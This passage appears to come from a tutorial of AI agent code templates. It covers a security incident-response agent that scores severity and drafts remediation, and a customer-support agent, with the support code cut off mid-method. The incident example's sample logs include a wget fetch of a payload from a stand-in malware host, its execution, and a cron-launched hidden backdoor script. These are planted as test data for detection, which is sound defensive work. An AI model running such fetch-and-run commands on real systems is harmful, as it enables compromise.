689 enriched_indicators: Dict[str, List[Dict[str, Any]]]
690 ) -> Dict[str, Any]:
691 """
692 Assess the severity of the security incident.
693
694 Args:
695 attack_techniques: Identified ATT&CK techniques
696 enriched_indicators: Enriched indicators from threat intelligence
697
698 Returns:
699 Dictionary with severity assessment
700 """
701 # Count high confidence techniques
702 high_confidence_techniques = sum(1 for t in attack_techniques if t.get("confidence", "").lower() == "high")
703
704 # Count malicious indicators
705 malicious_count = sum(
706 sum(1 for ind in ind_list if ind.get("malicious", False))
707 for ind_type, ind_list in enriched_indicators.items()
708 )
709
710 # Initial severity score calculation (0-100)
711 severity_score = 0
712
713 # Factor 1: Number of high confidence techniques (up to 40 points)
714 technique_score = min(high_confidence_techniques * 10, 40)
715 severity_score += technique_score
716
717 # Factor 2: Number of malicious indicators (up to 30 points)
718 indicator_score = min(malicious_count * 5, 30)
719 severity_score += indicator_score
720
721 # Factor 3: Types of techniques identified (up to 30 points)
722 # Check for high-severity techniques
723 high_severity_tactics = ["Impact", "Exfiltration", "Command and Control", "Privilege Escalation"]
724
725 tactic_score = 0
726 tactics_found = set()
727
728 for technique in attack_techniques:
729 tactic = technique.get("tactic", "")
730 if tactic:
731 tactics_found.add(tactic)
732
733 # Add extra points for high-severity tactics
734 if tactic in high_severity_tactics:
735 tactic_score += 5
736
737 # Add points for diversity of tactics (technique spread)
738 tactic_score += len(tactics_found) * 3
739 tactic_score = min(tactic_score, 30)
740
741 severity_score += tactic_score
742
743 # Determine severity level based on score
744 severity_level = "Informational"
745 if severity_score >= 80:
746 severity_level = "Critical"
747 elif severity_score >= 60:
748 severity_level = "High"
749 elif severity_score >= 40:
750 severity_level = "Medium"
751 elif severity_score >= 20:
752 severity_level = "Low"
753
754 return {
755 "severity_level": severity_level,
756 "severity_score": severity_score,
757 "factors": {
758 "high_confidence_techniques": high_confidence_techniques,
759 "malicious_indicators": malicious_count,
760 "tactics_identified": list(tactics_found),
761 "technique_score": technique_score,
762 "indicator_score": indicator_score,
763 "tactic_score": tactic_score
764 }
765 }
766
767 def generate_remediation_steps(
768 self,
769 attack_techniques: List[Dict[str, Any]],
770 severity_assessment: Dict[str, Any]
771 ) -> List[Dict[str, Any]]:
772 """
773 Generate remediation steps based on identified attack techniques.
774
775 Args:
776 attack_techniques: Identified ATT&CK techniques
777 severity_assessment: Severity assessment
778
779 Returns:
780 List of remediation steps
781 """
782 # Use OpenAI to generate remediation steps
783 # Prepare the prompt with attack techniques and severity
784 techniques_text = json.dumps(attack_techniques, indent=2)
785 severity_text = json.dumps(severity_assessment, indent=2)
786
787 prompt = f"""Based on the following identified attack techniques and severity assessment, provide detailed remediation steps:
788
789ATTACK TECHNIQUES:
790{techniques_text}
791
792SEVERITY ASSESSMENT:
793{severity_text}
794
795For each identified attack technique, provide:
7961. Immediate containment actions
7972. Eradication steps to remove the threat
7983. Recovery procedures
7994. Long-term prevention measures
800
801Consider the severity when prioritizing actions. Provide specific, actionable steps rather than general advice.
802Format the response as a JSON array of remediation steps, grouped by phase (containment, eradication, recovery, prevention).
803"""
804
805 try:
806 response = client.chat.completions.create(
807 model="gpt-4-turbo",
808 messages=[
809 {"role": "system", "content": "You are a cybersecurity incident response expert specialized in developing remediation plans."},
810 {"role": "user", "content": prompt}
811 ],
812 temperature=0.3,
813 response_format={"type": "json_object"}
814 )
815
816 # Extract and parse the response
817 remediation_steps = json.loads(response.choices[0].message.content)
818
819 # If the response is wrapped in a container object, extract the remediation array
820 if "remediation_steps" in remediation_steps:
821 remediation_steps = remediation_steps["remediation_steps"]
822
823 return remediation_steps
824
825 except Exception as e:
826 print(f"Error generating remediation steps: {e}")
827 return []
828
829 def analyze_incident(self, log_data: str, log_type: str = "generic", additional_context: str = None) -> Dict[str, Any]:
830 """
831 Analyze security incident data using the agent team.
832
833 Args:
834 log_data: Raw log data as string
835 log_type: Type of log data
836 additional_context: Additional context about the environment or incident
837
838 Returns:
839 Dictionary with comprehensive incident analysis
840 """
841 # Create a unique incident ID
842 incident_id = f"INC-{uuid.uuid4().hex[:8]}"
843
844 # Create group chat for agent collaboration
845 groupchat = autogen.GroupChat(
846 agents=[
847 self.user_proxy,
848 self.threat_detector,
849 self.forensic_investigator,
850 self.threat_intel_analyst,
851 self.incident_responder,
852 self.documentation_specialist
853 ],
854 messages=[],
855 max_round=15
856 )
857
858 manager = autogen.GroupChatManager(groupchat=groupchat)
859
860 # Process log data
861 parsed_logs = self.parse_log_data(log_data, log_type)
862
863 # Extract indicators
864 indicators = self.extract_indicators(parsed_logs)
865
866 # Enrich indicators with threat intelligence
867 enriched_indicators = self.enrich_indicators(indicators)
868
869 # Identify attack techniques
870 attack_techniques = self.identify_attack_techniques(parsed_logs, enriched_indicators)
871
872 # Assess severity
873 severity = self.assess_severity(attack_techniques, enriched_indicators)
874
875 # Generate remediation steps
876 remediation_steps = self.generate_remediation_steps(attack_techniques, severity)
877
878 # Prepare summary of findings for the agents
879 malicious_indicators_summary = ""
880 for ind_type, ind_list in enriched_indicators.items():
881 malicious = [ind for ind in ind_list if ind.get("malicious", False)]
882 if malicious:
883 malicious_indicators_summary += f"\n{ind_type.upper()} ({len(malicious)}):\n"
884 for ind in malicious[:5]: # Limit to 5 indicators per type for readability
885 tags = ", ".join(ind.get('tags', [])[:3]) # Limit tags to first 3
886 malicious_indicators_summary += f"- {ind['indicator']} (Score: {ind.get('reputation_score', 'N/A')}, Tags: {tags})\n"
887
888 if len(malicious) > 5:
889 malicious_indicators_summary += f" ... and {len(malicious) - 5} more\n"
890
891 # Prepare attack techniques summary
892 techniques_summary = ""
893 for i, technique in enumerate(attack_techniques[:5], 1): # Limit to 5 techniques for readability
894 technique_id = technique.get("technique_id", "Unknown")
895 name = technique.get("name", "Unknown")
896 confidence = technique.get("confidence", "Unknown")
897
898 techniques_summary += f"{i}. {technique_id} - {name} (Confidence: {confidence})\n"
899
900 # Add brief evidence
901 evidence = technique.get("evidence", "")
902 if isinstance(evidence, str) and evidence:
903 evidence_brief = evidence[:150] + "..." if len(evidence) > 150 else evidence
904 techniques_summary += f" Evidence: {evidence_brief}\n"
905
906 if len(attack_techniques) > 5:
907 techniques_summary += f"... and {len(attack_techniques) - 5} more techniques\n"
908
909 # Generate initial prompt for the agent team
910 analysis_prompt = f"""
911 SECURITY INCIDENT ANALYSIS
912 Incident ID: {incident_id}
913 Log Type: {log_type}
914 Severity: {severity['severity_level']} (Score: {severity['severity_score']}/100)
915
916 I need your collaborative analysis of this security incident. Initial automated analysis has identified:
917
918 POTENTIAL ATTACK TECHNIQUES:
919 {techniques_summary}
920
921 MALICIOUS INDICATORS:
922 {malicious_indicators_summary}
923
924 LOG SAMPLE (first 5 entries):
925 {json.dumps(parsed_logs[:5], indent=2)}
926
927 {"ADDITIONAL CONTEXT:\n" + additional_context if additional_context else ""}
928
929 I need the team to work together to provide:
930 1. ThreatDetector: Analyze the logs for additional suspicious patterns and refine the attack identification
931 2. ForensicInvestigator: Reconstruct the incident timeline and determine the scope of compromise
932 3. ThreatIntelAnalyst: Provide context on the threat actors and their TTPs based on the indicators
933 4. IncidentResponder: Create a detailed remediation plan with prioritized actions
934 5. DocumentationSpecialist: Compile all findings into a comprehensive incident report
935
936 The SecurityAnalyst (me) will coordinate your work. Please be specific, thorough, and actionable in your analysis.
937 """
938
939 # Start the group chat
940 result = self.user_proxy.initiate_chat(
941 manager,
942 message=analysis_prompt
943 )
944
945 # Extract the final report
946 final_report = None
947 for message in reversed(self.user_proxy.chat_history):
948 if message['role'] == 'assistant' and 'DocumentationSpecialist' in message.get('name', ''):
949 final_report = message['content']
950 break
951
952 if not final_report:
953 # Use the last substantial response if no clear report
954 for message in reversed(self.user_proxy.chat_history):
955 if message['role'] == 'assistant' and len(message['content']) > 500:
956 final_report = message['content']
957 break
958
959 # Compile the complete analysis results
960 analysis_result = {
961 "incident_id": incident_id,
962 "timestamp": datetime.datetime.now().isoformat(),
963 "log_type": log_type,
964 "severity": severity,
965 "indicators": {
966 "total": {
967 k: len(v) for k, v in indicators.items() if v
968 },
969 "malicious": {
970 k: len([ind for ind in v if ind.get("malicious", False)])
971 for k, v in enriched_indicators.items() if v
972 },
973 "details": enriched_indicators
974 },
975 "attack_techniques": attack_techniques,
976 "remediation_steps": remediation_steps,
977 "report": final_report,
978 "metadata": {
979 "log_count": len(parsed_logs),
980 "analysis_version": "1.0"
981 }
982 }
983
984 return analysis_result
985
986# Example usage
987if __name__ == "__main__":
988 # Create incident response agent
989 ir_agent = CybersecurityIncidentResponseAgent()
990
991 # Example log data (simplified for demonstration)
992 example_logs = """
993Apr 15 12:34:56 server sshd[12345]: Failed password for invalid user admin from 203.0.113.1 port 49812 ssh2
994Apr 15 12:35:01 server sshd[12345]: Failed password for invalid user admin from 203.0.113.1 port 49813 ssh2
995Apr 15 12:35:05 server sshd[12345]: Failed password for invalid user admin from 203.0.113.1 port 49814 ssh2
996Apr 15 12:35:10 server sshd[12345]: Failed password for invalid user admin from 203.0.113.1 port 49815 ssh2
997Apr 15 12:35:15 server sshd[12345]: Failed password for invalid user admin from 203.0.113.1 port 49816 ssh2
998Apr 15 12:35:30 server sshd[12346]: Accepted password for user root from 203.0.113.1 port 49820 ssh2
999Apr 15 12:36:00 server sudo: root : TTY=pts/0 ; PWD=/root ; USER=root ; COMMAND=/bin/bash -c wget http://malware.example.com/payload.sh
1000Apr 15 12:36:10 server sudo: root : TTY=pts/0 ; PWD=/root ; USER=root ; COMMAND=/bin/bash payload.sh
1001Apr 15 12:37:05 server kernel: [1234567.123456] Firewall: Blocked outbound connection to 198.51.100.1:8080
1002Apr 15 12:38:30 server crontab[12347]: (root) BEGIN EDIT (root)
1003Apr 15 12:38:45 server crontab[12347]: (root) END EDIT (root)
1004Apr 15 12:39:00 server cron[12348]: (root) CMD (/usr/bin/python3 /tmp/.hidden/backdoor.py)
1005 """
1006
1007 # Analyze the incident
1008 analysis = ir_agent.analyze_incident(
1009 log_data=example_logs,
1010 log_type="syslog",
1011 additional_context="Linux server running in AWS. Contains customer data and is publicly accessible."
1012 )
1013
1014 # Print a summary of the results
1015 print(f"Incident ID: {analysis['incident_id']}")
1016 print(f"Severity: {analysis['severity']['severity_level']} (Score: {analysis['severity']['severity_score']})")
1017 print("\nMalicious Indicators:")
1018 for ind_type, count in analysis['indicators']['malicious'].items():
1019 if count > 0:
1020 print(f"- {ind_type}: {count}")
1021
1022 print("\nAttack Techniques:")
1023 for technique in analysis['attack_techniques'][:3]: # Show first 3
1024 print(f"- {technique.get('technique_id', 'Unknown')}: {technique.get('name', 'Unknown')}")
1025
1026 print("\nReport Excerpt:")
1027 if analysis['report']:
1028 report_excerpt = analysis['report'][:500] + "..." if len(analysis['report']) > 500 else analysis['report']
1029 print(report_excerpt)

Usage Example:

python
1from cybersecurity_incident_response_agent import CybersecurityIncidentResponseAgent
2
3# Initialize the agent
4ir_agent = CybersecurityIncidentResponseAgent()
5
6# Example firewall logs
7firewall_logs = """
8timestamp=2023-10-15T08:12:45Z src=192.168.1.105 dst=103.45.67.89 proto=TCP sport=49123 dport=445 action=BLOCK reason=policy
9timestamp=2023-10-15T08:12:47Z src=192.168.1.105 dst=103.45.67.89 proto=TCP sport=49124 dport=445 action=BLOCK reason=policy
10timestamp=2023-10-15T08:13:01Z src=192.168.1.106 dst=103.45.67.89 proto=TCP sport=51234 dport=445 action=BLOCK reason=policy
11timestamp=2023-10-15T09:23:15Z src=103.45.67.89 dst=192.168.1.50 proto=TCP sport=3389 dport=49562 action=ALLOW reason=policy
12timestamp=2023-10-15T09:25:03Z src=192.168.1.50 dst=185.147.22.55 proto=TCP sport=49621 dport=443 action=ALLOW reason=policy
13timestamp=2023-10-15T09:26:45Z src=192.168.1.50 dst=185.147.22.55 proto=TCP sport=49622 dport=443 action=ALLOW reason=policy
14timestamp=2023-10-15T09:27:12Z src=192.168.1.50 dst=185.147.22.55 proto=TCP sport=49623 dport=443 action=ALLOW reason=policy
15timestamp=2023-10-15T10:45:13Z src=192.168.1.50 dst=172.16.10.5 proto=TCP sport=49755 dport=139 action=ALLOW reason=policy
16timestamp=2023-10-15T10:45:15Z src=192.168.1.50 dst=172.16.10.5 proto=TCP sport=49756 dport=445 action=ALLOW reason=policy
17timestamp=2023-10-15T10:46:02Z src=192.168.1.50 dst=172.16.10.6 proto=TCP sport=49802 dport=445 action=ALLOW reason=policy
18"""
19
20# Additional context about the environment
21additional_context = """
22This is a corporate network with approximately 200 endpoints. The environment includes:
23- Windows workstations and servers
24- Office 365 cloud services
25- VPN for remote access
26- Sensitive financial data stored on internal file servers
27- PCI compliance requirements
28"""
29
30# Analyze the incident
31analysis = ir_agent.analyze_incident(
32 log_data=firewall_logs,
33 log_type="firewall",
34 additional_context=additional_context
35)
36
37# Print key findings
38print(f"INCIDENT ID: {analysis['incident_id']}")
39print(f"SEVERITY: {analysis['severity']['severity_level']} (Score: {analysis['severity']['severity_score']})")
40
41print("\nKEY INDICATORS:")
42for ind_type, count in analysis['indicators']['malicious'].items():
43 if count > 0:
44 print(f"- {ind_type}: {count} malicious out of {analysis['indicators']['total'].get(ind_type, 0)} total")
45
46print("\nATTACK TECHNIQUES:")
47for technique in analysis['attack_techniques']:
48 print(f"- {technique.get('technique_id', 'N/A')}: {technique.get('name', 'N/A')} ({technique.get('confidence', 'N/A')})")
49
50print("\nTOP REMEDIATION STEPS:")
51for phase, steps in analysis['remediation_steps'][0].items():
52 print(f"\n{phase.upper()}:")
53 for i, step in enumerate(steps[:3], 1): # Show top 3 steps per phase
54 print(f"{i}. {step}")
55 if len(steps) > 3:
56 print(f" ... and {len(steps) - 3} more steps")
57
58print("\nFULL REPORT AVAILABLE IN ANALYSIS RESULT")

This Cybersecurity Incident Response agent template demonstrates key security automation patterns:

  1. Specialized Analysis: Different security specialties (forensics, threat intelligence, remediation) working together
  2. Threat Intelligence Integration: Automated enrichment of indicators with reputation data
  3. MITRE ATT&CK Mapping: Structured identification of attack techniques
  4. Risk-Based Prioritization: Severity assessment to focus on the most critical issues
  5. Actionable Remediation: Clear, prioritized steps for different incident response phases

AI Customer Support Automation (Intelligent Chatbot & Sentiment Analysis)

This AI agent template is designed to handle customer support interactions, providing intelligent responses, routing complex issues to specialists, and analyzing customer sentiment. It provides a complete customer support solution with continuous learning capabilities.

Core Capabilities:

  • Natural conversation handling with context awareness
  • Knowledge base integration for accurate responses
  • Sentiment analysis and customer satisfaction tracking
  • Ticket categorization and priority assignment
  • Specialist routing for complex issues
  • Continuous improvement through feedback loops

Architecture:

Customer Support Automation Architecture

Implementation Example:

python
1# customer_support_agent.py
2import os
3import json
4import datetime
5import uuid
6import pandas as pd
7import numpy as np
8import autogen
9import openai
10import re
11import logging
12from typing import Dict, List, Any, Optional, Union, Tuple
13
14# Configure API keys and settings
15OPENAI_API_KEY = os.environ.get("OPENAI_API_KEY", "your-api-key")
16
17# Initialize OpenAI client
18client = openai.OpenAI(api_key=OPENAI_API_KEY)
19
20# Configure logging
21logging.basicConfig(
22 level=logging.INFO,
23 format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
24 handlers=[
25 logging.FileHandler("customer_support.log"),
26 logging.StreamHandler()
27 ]
28)
29
30logger = logging.getLogger("customer_support_agent")
31
32class CustomerSupportAgent:
33 """
34 An AI-powered customer support agent that handles customer inquiries,
35 analyzes sentiment, and routes complex issues to specialists.
36 """
37
38 def __init__(self, config=None):
39 """
40 Initialize the Customer Support Agent.
41
42 Args:
43 config: Optional configuration dictionary with settings
44 """
45 self.config = config or {}
46
47 # Knowledge base file path
48 self.knowledge_base_path = self.config.get("knowledge_base_path", "knowledge_base.json")
49
50 # Load knowledge base if it exists, otherwise create an empty one
51 self.knowledge_base = self._load_knowledge_base()
52
53 # Customer conversation history
54 self.conversation_history = {}
55
56 # Load conversation history if available
57 self.history_path = self.config.get("history_path", "conversation_history.json")
58 if os.path.exists(self.history_path):
59 try:
60 with open(self.history_path, 'r') as f:
61 self.conversation_history = json.load(f)
62 except Exception as e:
63 logger.error(f"Error loading conversation history: {e}")
64
65 # Set up agent configuration
66 self.llm_config = {
67 "config_list": [{"model": "gpt-4-turbo", "api_key": OPENAI_API_KEY}],
68 "temperature": 0.7,
69 "timeout": 60
70 }
71
72 # Create the agent team
73 self._create_agent_team()
74
75 # Ticket system
76 self.tickets = {}
77
78 # Load tickets if available
79 self.tickets_path = self.config.get("tickets_path", "support_tickets.json")
80 if os.path.exists(self.tickets_path):
81 try:
82 with open(self.tickets_path, 'r') as f:
83 self.tickets = json.load(f)
84 except Exception as e:
85 logger.error(f"Error loading tickets: {e}")
86
87 def _load_knowledge_base(self) -> Dict:
88 """
89 Load the knowledge base from a JSON file.
90
91 Returns:
92 Dictionary containing the knowledge base
93 """
94 if os.path.exists(self.knowledge_base_path):
95 try:
96 with open(self.knowledge_base_path, 'r') as f:
97 return json.load(f)
98 except Exception as e:
99 logger.error(f"Error loading knowledge base: {e}")
100
101 # If file doesn't exist or has errors, initialize with empty structure
102 return {
103 "products": {},
104 "faqs": {},
105 "troubleshooting": {},
106 "policies": {},
107 "response_templates": {}
108 }
109
110 def save_knowledge_base(self):
111 """Save the knowledge base to a JSON file."""
112 try:
113 with open(self.knowledge_base_path, 'w') as f:
114 json.dump(self.knowledge_base, f, indent=2)
115 logger.info("Knowledge base saved successfully")
116 except Exception as e:
117 logger.error(f"Error saving knowledge base: {e}")
118
119 def _create_agent_team(self):
120 """Create the team of specialized agents for customer support."""
121
122 # 1. Front Desk Agent - First point of contact
123 self.front_desk_agent = autogen.AssistantAgent(
124 name="FrontDeskAgent",
125 system_message="""You are a friendly and helpful front desk customer support agent.
126 You are the first point of contact for all customer inquiries.
127
128 Your responsibilities:
129 1. Greet customers in a friendly manner
130 2. Identify the customer's core issue or request
131 3. Provide immediate help for simple questions
132 4. Collect relevant information for complex issues
133 5. Create a positive first impression
134
135 Always be polite, empathetic, and patient. Use a conversational tone while remaining professional.
136 Ask clarifying questions when necessary to better understand the customer's needs.
137 If you can resolve the issue immediately with your knowledge, do so. Otherwise, acknowledge
138 the customer's concern and prepare to route them to a specialist.""",
139 llm_config=self.llm_config
140 )
141
142 # 2. Technical Support Specialist - For technical problems
143 self.technical_specialist = autogen.AssistantAgent(
144 name="TechnicalSpecialist",
145 system_message="""You are an expert technical support specialist with deep knowledge
146 of all our products, services, and common technical issues.
147
148 Your responsibilities:
149 1. Diagnose technical problems based on customer descriptions
150 2. Provide step-by-step troubleshooting guidance
151 3. Explain technical concepts in user-friendly language
152 4. Document technical issues for knowledge base updates
153 5. Identify when escalation to engineering is needed
154
155 Focus on clear, accurate instructions. Walk customers through troubleshooting steps one at a time.
156 Verify each step is completed before moving to the next. Be patient with customers who may not be
157 technically savvy. When providing solutions, briefly explain the cause of the issue to help customers
158 understand and potentially prevent similar problems in the future.""",
159 llm_config=self.llm_config
160 )
161
162 # 3. Billing Specialist - For payment and account issues
163 self.billing_specialist = autogen.AssistantAgent(
164 name="BillingSpecialist",
165 system_message="""You are an expert billing and account specialist with comprehensive knowledge
166 of our billing systems, subscription plans, and payment processes.
167
168 Your responsibilities:
169 1. Resolve billing inquiries and payment issues
170 2. Explain charges, fees, and subscription details
171 3. Guide customers through payment processes
172 4. Assist with account status questions
173 5. Handle refund and credit inquiries
174
175 Be thorough and precise when discussing financial matters. Always verify account information
176 before providing specific details. Explain billing concepts clearly and without technical jargon.
177 Show empathy when customers are frustrated about billing issues while remaining factual and
178 solution-oriented. Ensure compliance with financial regulations in all interactions.""",
179 llm_config=self.llm_config
180 )
181
182 # 4. Product Specialist - For product-specific questions
183 self.product_specialist = autogen.AssistantAgent(
184 name="ProductSpecialist",
185 system_message="""You are an expert product specialist with in-depth knowledge of all
186 our products, features, comparisons, and use cases.
187
188 Your responsibilities:
189 1. Provide detailed product information and specifications
190 2. Compare products and recommend options based on customer needs
191 3. Explain product features and benefits
192 4. Assist with product setup and configuration
193 5. Address product compatibility questions
194
195 Be enthusiastic and knowledgeable about our products without being pushy. Focus on
196 helping customers find the right product for their specific needs. Highlight key features
197 and benefits relevant to the customer's use case. Provide accurate specifications and
198 honest comparisons. If you don't know a specific detail, acknowledge this rather than
199 guessing.""",
200 llm_config=self.llm_config
201 )
202
203 # 5. Customer Satisfaction Specialist - For complaints and escalations
204 self.satisfaction_specialist = autogen.AssistantAgent(
205 name="SatisfactionSpecialist",
206 system_message="""You are an expert customer satisfaction specialist who excels at
207 handling complaints, escalations, and turning negative experiences into positive ones.
208
209 Your responsibilities:
210 1. Address customer complaints with empathy and understanding
211 2. De-escalate tense situations and resolve conflicts
212 3. Find creative solutions to satisfy dissatisfied customers
213 4. Identify process improvements from complaint patterns
214 5. Ensure customer retention through exceptional service recovery
215
216 Always validate the customer's feelings first before moving to solutions. Use phrases like
217 "I understand why that would be frustrating" and "You're right to bring this to our attention."
218 Take ownership of issues even if they weren't your fault. Focus on what you can do rather
219 than limitations. Be generous in making things right - the lifetime value of a retained
220 customer far exceeds most compensation costs.""",
221 llm_config=self.llm_config
222 )
223
224 # 6. Support Manager - For coordinating complex cases
225 self.support_manager = autogen.AssistantAgent(
226 name="SupportManager",
227 system_message="""You are an experienced support manager who coordinates complex
228 support cases and ensures customers receive the best possible assistance.
229
230 Your responsibilities:
231 1. Evaluate complex customer issues and determine the best approach
232 2. Coordinate between different specialist agents when needed
233 3. Make executive decisions about exceptional customer service measures
234 4. Ensure consistent quality of support across all interactions
235 5. Identify systemic issues that need to be addressed
236
237 Your focus is on ensuring exceptional customer service in complex situations. You have
238 authority to approve special exceptions to policies when warranted. Coordinate the efforts
239 of specialist agents to provide a seamless experience. Recognize when an issue indicates
240 a larger problem that needs to be addressed. Always maintain a professional, leadership-oriented
241 tone while showing genuine concern for customer satisfaction.""",
242 llm_config=self.llm_config
243 )
244
245 # User proxy agent for orchestrating the workflow
246 self.user_proxy = autogen.UserProxyAgent(
247 name="CustomerServiceCoordinator",
248 human_input_mode="NEVER",
249 code_execution_config=False,
250 system_message="""You are a coordinator for customer service interactions.
251 Your role is to manage the flow of information between the customer and the specialized agents.
252 You help route customer inquiries to the right specialist and ensure a smooth conversation."""
253 )
254
255 def analyze_sentiment(self, text: str) -> Dict[str, Any]:
256 """
257 Analyze the sentiment of customer messages.
258
259 Args:
260 text: Customer message text
261
262 Returns:
263 Dictionary with sentiment analysis results
264 """
265 try:
266 # Use OpenAI to analyze sentiment
267 response = client.chat.completions.create(
268 model="gpt-4-turbo",
269 messages=[
270 {"role": "system", "content": "You are a sentiment analysis expert. Analyze the customer message and provide a detailed sentiment assessment."},
271 {"role": "user", "content": f"Analyze the sentiment of this customer message. Return a JSON object with sentiment_score (from -1 to 1), emotion_label (angry, frustrated, neutral, satisfied, happy), urgency_level (low, medium, high), and key_issues (array of issues mentioned).\n\nCustomer message: {text}"}
272 ],
273 temperature=0.2,
274 response_format={"type": "json_object"}
275 )
276
277 # Parse the response
278 sentiment_analysis = json.loads(response.choices[0].message.content)
279
280 return sentiment_analysis
281
282 except Exception as e:
283 logger.error(f"Error analyzing sentiment: {e}")
284 # Return default values if analysis fails
285 return {
286 "sentiment_score": 0,
287 "emotion_label": "neutral",
288 "urgency_level": "medium",
289 "key_issues": []
290 }
291
292 def categorize_inquiry(self, text: str) -> Dict[str, Any]:
293 """
294 Categorize a customer inquiry to determine routing.
295
296 Args:
297 text: Customer inquiry text
298
299 Returns:
300 Dictionary with categorization results
301 """
302 try:
303 # Use OpenAI to categorize the inquiry
304 response = client.chat.completions.create(
305 model="gpt-4-turbo",
306 messages=[
307 {"role": "system", "content": "You are a customer support specialist who categorizes incoming customer inquiries."},
308 {"role": "user", "content": f"Categorize this customer inquiry. Return a JSON object with primary_category (technical, billing, product, account, general, complaint), subcategory (specific issue type), priority (low, medium, high, urgent), and required_info (array of information needed to resolve).\n\nCustomer inquiry: {text}"}
309 ],
310 temperature=0.2,
311 response_format={"type": "json_object"}
312 )
313
314 # Parse the response
315 categorization = json.loads(response.choices[0].message.content)
316
317 return categorization
318
319 except Exception as e:
320 logger.error(f"Error categorizing inquiry: {e}")
321 # Return default values if categorization fails
322 return {
323 "primary_category": "general",
324 "subcategory": "undefined",
325 "priority": "medium",
326 "required_info": []
327 }
328
329 def search_knowledge_base(self, query: str, category: str = None) -> List[Dict[str, Any]]:
330 """
331 Search the knowledge base for relevant information.
332
333 Args:
334 query: Search query
335 category: Optional category to limit search
336
337 Returns:
338 List of relevant knowledge base entries
339 """
340 results = []
341
342 try:
343 # Use OpenAI to identify relevant knowledge base entries
344 # First, convert our knowledge base to a string representation
345 kb_text = json.dumps(self.knowledge_base, indent=2)
346
347 # Prepare the prompt
348 prompt = f"""Given the following knowledge base and a customer query, identify the most relevant entries that would help answer the query.
349
350 KNOWLEDGE BASE:
351 {kb_text}
352
353 CUSTOMER QUERY:
354 {query}
355
356 Return a JSON array of the most relevant entries, with each object containing:
357 1. category: The category in the knowledge base
358 2. key: The specific key within that category
359 3. relevance_score: A score from 0-1 indicating how relevant this entry is to the query
360 4. reasoning: Brief explanation of why this is relevant
361
362 Only include entries with relevance_score > 0.7. Limit to the top 3 most relevant entries.
363 """
364
365 # Get response from OpenAI
366 response = client.chat.completions.create(
367 model="gpt-4-turbo",
368 messages=[
369 {"role": "system", "content": "You are a knowledge base search specialist who identifies the most relevant information to address customer queries."},
370 {"role": "user", "content": prompt}
371 ],
372 temperature=0.2,
373 response_format={"type": "json_object"}
374 )
375
376 # Parse the response
377 search_results = json.loads(response.choices[0].message.content)
378
379 # Extract the actual content for each result
380 if "results" in search_results:
381 search_results = search_results["results"]
382
383 for result in search_results:
384 category = result.get("category")
385 key = result.get("key")
386
387 if category in self.knowledge_base and key in self.knowledge_base[category]:
388 content = self.knowledge_base[category][key]
389 results.append({
390 "category": category,
391 "key": key,
392 "content": content,
393 "relevance_score": result.get("relevance_score", 0.7),
394 "reasoning": result.get("reasoning", "")
395 })
396
397 return results
398
399 except Exception as e:
400 logger.error(f"Error searching knowledge base: {e}")
401 return []
402
403 def create_support_ticket(self, customer_id: str, inquiry: str, category: str, priority: str) -> Dict[str, Any]:
404 """
405 Create a support ticket for a customer inquiry.
406
407 Args:
408 customer_id: Unique customer identifier
409 inquiry: Customer inquiry text
410 category: Issue category
411 priority: Issue priority
412
413 Returns:
414 Dictionary with ticket information
415 """
416 # Generate a unique ticket ID
417 ticket_id = f"TICKET-{uuid.uuid4().hex[:8]}"
418
419 # Analyze sentiment
420 sentiment = self.analyze_sentiment(inquiry)
421
422 # Create the ticket
423 ticket = {
424 "ticket_id": ticket_id,
425 "customer_id": customer_id,
426 "created_at": datetime.datetime.now().isoformat(),
427 "updated_at": datetime.datetime.now().isoformat(),
428 "status": "open",
429 "category": category,
430 "subcategory": "",
431 "priority": priority,
432 "inquiry": inquiry,
433 "sentiment": sentiment,
434 "agent_assigned": None,
435 "resolution": None,
436 "resolution_time": None,
437 "feedback": None,
438 "satisfaction_score": None,
439 "history": [
440 {
441 "timestamp": datetime.datetime.now().isoformat(),
442 "action": "ticket_created",
443 "details": "Ticket created from customer inquiry"
444 }
445 ]
446 }
447
448 # Store the ticket
449 self.tickets[ticket_id] = ticket
450
451 # Save tickets to disk
452 self._save_tickets()
453
454 return ticket
455
456 def _save_tickets(self):
457 """Save support tickets to a JSON file."""
458 try:
459 with open(self.tickets_path, 'w') as f:
460 json.dump(self.tickets, f, indent=2)
461 logger.info("Support tickets saved successfully")
462 except Exception as e:
463 logger.error(f"Error saving support tickets: {e}")
464
465 def update_ticket(self, ticket_id: str, updates: Dict[str, Any]) -> Dict[str, Any]:
466 """
467 Update an existing support ticket.
468
469 Args:
470 ticket_id: Ticket identifier
471 updates: Dictionary of fields to update
472
473 Returns:
474 Updated ticket information
475 """
476 if ticket_id not in self.tickets:
477 logger.error(f"Ticket {ticket_id} not found")
478 return None
479
480 # Get the existing ticket
481 ticket = self.tickets[ticket_id]
482
483 # Update fields
484 for key, value in updates.items():
485 if key != "history" and key != "ticket_id":
486 ticket[key] = value
487
488 # Add history entry
489 history_entry = {
490 "timestamp": datetime.datetime.now().isoformat(),
491 "action": "ticket_updated",
492 "details": f"Updated fields: {', '.join(updates.keys())}"
493 }
494 ticket["history"].append(history_entry)
495
496 # Update the updated_at timestamp
497 ticket["updated_at"] = datetime.datetime.now().isoformat()
498
499 # Save the updated ticket
500 self.tickets[ticket_id] = ticket
501 self._save_tickets()
502
503 return ticket
504
505 def close_ticket(self, ticket_id: str, resolution: str, satisfaction_score: Optional[int] = None) -> Dict[str, Any]:
506 """
507 Close a support ticket with resolution.
508
509 Args:
510 ticket_id: Ticket identifier
511 resolution: Resolution description
512 satisfaction_score: Optional customer satisfaction score (1-5)
513
514 Returns:
515 Closed ticket information
516 """
517 if ticket_id not in self.tickets:
518 logger.error(f"Ticket {ticket_id} not found")
519 return None
520
521 # Get the existing ticket
522 ticket = self.tickets[ticket_id]
523
524 # Calculate resolution time
525 created_at = datetime.datetime.fromisoformat(ticket["created_at"])
526 closed_at = datetime.datetime.now()
527 resolution_time_seconds = (closed_at - created_at).total_seconds()
528
529 # Update ticket
530 updates = {
531 "status": "closed",
532 "resolution": resolution,
533 "resolution_time": resolution_time_seconds,
534 "updated_at": closed_at.isoformat()
535 }
536
537 if satisfaction_score is not None:
538 updates["satisfaction_score"] = satisfaction_score
539
540 # Add history entry
541 history_entry = {
542 "timestamp": closed_at.isoformat(),
543 "action": "ticket_closed",
544 "details": f"Ticket closed with resolution: {resolution}"
545 }
546
547 # Apply updates
548 for key, value in updates.items():
549 ticket[key] = value
550
551 ticket["history"].append(history_entry)
552
553 # Save the updated ticket
554 self.tickets[ticket_id] = ticket
555 self._save_tickets()
556
557 # Extract learnings from this ticket
